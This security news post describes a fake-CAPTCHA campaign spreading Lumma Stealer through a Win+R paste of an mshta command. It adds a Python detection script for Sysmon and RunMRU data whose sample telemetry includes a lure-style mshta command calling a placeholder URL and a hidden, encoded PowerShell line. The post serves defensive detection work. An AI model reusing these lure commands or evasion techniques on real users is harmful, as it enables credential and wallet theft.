
Fake CAPTCHA Campaign Distributing Lumma Stealer Malware Targets Global Industries

January 27, 2025, by
Quantumsec

A sophisticated malware campaign leveraging fake CAPTCHA verification pages has been discovered, targeting industries worldwide with the Lumma Stealer information-stealing malware. The campaign, active since late 2024, continues to evolve with new tactics and broader targets.

Attack Methodology

The infection chain relies on the victim, not on a software exploit, to run the first stage:

  1. Compromised Websites: Victims land on a hacked legitimate site, an attacker-controlled site, or one of the lookalike domains described below.
  2. Fake CAPTCHA Pages: Users are redirected to a page styled as a CAPTCHA "verification" that tells them to prove they are human by opening the Windows Run prompt (Win+R), pasting (Ctrl+V) and pressing Enter. The page's JavaScript has already placed the malicious command on the clipboard, so the user pastes it without ever reading it.
  3. Execution of Malicious Command: The pasted command invokes mshta.exe with a remote URL; mshta.exe fetches the HTA file from the attacker's server and executes it.
  4. Payload Delivery: The HTA launches PowerShell, which runs a chain of further scripts that fetch and load Lumma Stealer.
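The four stages above map directly onto process telemetry that Sysmon or an EDR already collects, so the chain is easy to hunt for once you know the shape. The block below is an added example written for this page, not code from the original post or from any vendor or product: it applies two checks to constructed sample data (the PIDs, command lines, and registry values are made up, and the URL uses a placeholder domain). The first check looks for the explorer.exe → mshta.exe → powershell.exe parent/child chain and decodes any -EncodedCommand blob it finds; the second scans the Win+R history that Windows persists under the RunMRU registry key, which survives even if the process telemetry was not kept.

```python
"""Detection for the fake-CAPTCHA (Run prompt -> mshta -> PowerShell) chain.

Added example, not from the original post. All telemetry below is constructed.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 / Windows 4688 style)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; -ep (ExecutionPolicy) must not match.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Binaries that have no business being launched from the Run prompt with a remote URL.
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "certutil.exe"}


def exe_name(token: str) -> str:
    """Normalise a full path or bare command word to a lower-case 'name.exe'."""
    name = token.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name if name.endswith(".exe") else name + ".exe"


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def find_fake_captcha_chain(events):
    """Return (rule, pid, detail) tuples for events that match the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = exe_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = exe_name(parent.image) if parent else ""
        url = URL_RE.search(e.cmdline)
        # Stage 1: anything typed into Win+R is spawned by explorer.exe. A LOLBin
        # started that way with a remote URL on its command line is the pasted lure.
        if pname == "explorer.exe" and name in LOLBINS and url:
            findings.append(("run_box_remote_payload", e.pid, url.group(0)))
        # Stage 2: the HTA hands off to PowerShell. mshta.exe spawning a shell is
        # abnormal on its own; surface the decoded command so an analyst can read it.
        if pname == "mshta.exe" and name in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(e.cmdline)
            findings.append(("powershell_from_mshta", e.pid, decoded or e.cmdline))
    return findings


def scan_runmru(values):
    """Scan HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU values.

    Each entry stores the typed command followed by a literal backslash and '1'.
    """
    hits = []
    for name, raw in values.items():
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if not cmd.strip():
            continue
        if exe_name(cmd.split()[0]) in LOLBINS and URL_RE.search(cmd):
            hits.append((name, cmd))
    return hits


# Constructed sample telemetry. The -enc blob decodes to the harmless command "whoami".
SAMPLE_EVENTS = [
    ProcEvent(800, 4, r"C:\Windows\System32\winlogon.exe", "winlogon.exe"),
    ProcEvent(1000, 800, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\mshta.exe",
              'mshta https://captcha.example.invalid/verify.mp4 # "I am not a robot - Verification ID: 7811"'),
    ProcEvent(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -enc dwBoAG8AYQBtAGkA"),
    ProcEvent(3000, 1000, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              'chrome.exe "https://www.example.com/"'),        # benign: browser with a URL argument
    ProcEvent(4000, 1000, r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),  # benign: local HTA, no remote URL
]

SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "mshta https://captcha.example.invalid/verify.mp4 # I am not a robot\\1",
    "MRUList": "ba",
}

if __name__ == "__main__":
    for finding in find_fake_captcha_chain(SAMPLE_EVENTS):
        print("process chain:", finding)
    for hit in scan_runmru(SAMPLE_RUNMRU):
        print("RunMRU history:", hit)
```

Two of the sample events are deliberately benign (a browser launched with a URL, and mshta.exe running a local HTA from an installer) and produce no finding; the pasted lure and the PowerShell stage each produce one. In production the same logic would run over exported Sysmon or 4688 events rather than the inline list, and the RunMRU check would be fed from a registry export or a live query of the user hive.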

Target Scope and Impact

The campaign has targeted organizations across multiple sectors:

  • Industries: Telecommunications (most targeted), healthcare, banking, and marketing.
  • Countries: Victims have been identified in Argentina, Colombia, the United States, the Philippines, and beyond.

Technical Advancements

The Lumma Stealer campaign combines several techniques to get past defenses and to scale its delivery:

  • Antimalware Evasion: Bypasses the Windows Antimalware Scan Interface (AMSI), so the PowerShell stages are not inspected as they are decoded and run.
  • Execution Context: Because the user runs the command from the Run prompt, the whole chain executes outside the browser, so browser download protections and web-filtering controls never see the payload.
  • Malware-as-a-Service (MaaS): Lumma is rented to affiliates, so many independent operators run their own distribution campaigns; the resulting spread of infrastructure and lures complicates detection and response.
  • Expanded Distribution: Nearly 1,000 counterfeit domains impersonate services such as Reddit and WeTransfer.
  • Encryption and Obfuscation: Decrypts its embedded configuration at runtime with the ChaCha20 cipher, and delivers payloads inside password-protected archives that scanners cannot inspect.

Data Targeted

The malware focuses on stealing high-value user data, including:

  • Passwords stored in browsers.
  • Cryptocurrency wallet credentials.
  • Credit card information.
  • Two-factor authentication (2FA) tokens.

Recent Developments

The campaign has shown adaptability, incorporating new tools and methods:

  • Fake Domains: The lookalike domains redirect visitors to malware-laden files rather than to the service they impersonate.
  • SelfAU3 Dropper: A custom AutoIt-based dropper used to launch Lumma.
  • Integration with the Amadey Trojan: The same infections are used to load additional malware families, extending what the operators can do on a compromised host.

Broader Implications

The campaign underscores a growing trend of sophisticated social engineering and Malware-as-a-Service distribution. Recent tactics include mimicking legitimate services like Reddit, WeTransfer, and Gravatar to increase credibility and trick users into executing malicious commands.


This global campaign highlights the importance of user awareness and robust endpoint protection. Organizations are advised to implement strict access controls, train employees to recognize phishing attempts (in particular, that no legitimate CAPTCHA ever asks a user to paste a command into the Run prompt), and deploy threat detection that alerts on mshta.exe and PowerShell being launched from the Run prompt or with remote URLs on their command lines.
